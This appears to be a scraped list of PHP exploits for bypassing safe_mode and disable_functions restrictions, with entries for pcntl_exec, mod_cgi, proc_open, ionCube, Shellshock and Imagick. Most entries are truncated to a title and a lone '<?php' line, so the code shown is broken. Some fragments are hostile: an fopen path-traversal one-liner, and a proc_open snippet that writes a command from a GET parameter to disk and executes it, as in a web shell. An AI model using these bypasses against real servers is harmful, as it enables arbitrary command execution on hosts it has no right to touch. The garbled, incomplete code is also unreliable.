PHP 4 >= 4.2.0, PHP 5 pcntl_exec
1 | <?php |
mod_cgi
1 | <?php |
via mem
1 | <?php |
PHP 5.2 - FOpen Exploit
1 | php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' |
PHP 5.2.3 - Win32std ext Protections Bypass
1 | <?php |
PHP Perl Extension Safe_mode Bypass Exploit
1 | <?php |
PHP safe_mode bypass via proc_open() and custom environment Exploit
1 | <!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"), |
PHP 5.2.4 and 5.2.5 PHP cURL
1 | source: http://www.securityfocus.com/bid/27413/info |
PHP <= 5.2.9 on windows
1 |
|
cmd.bat1
2dir > abyss.txt
exit
PHP 5.2.4 ionCube extension Exploit
1 | <?php |
PHP 5.x Shellshock Exploit
1 | <?php |
Imagick <= 3.3.0 PHP >= 5.4 Exploit
1 | # Exploit Title: PHP Imagick disable_functions Bypass |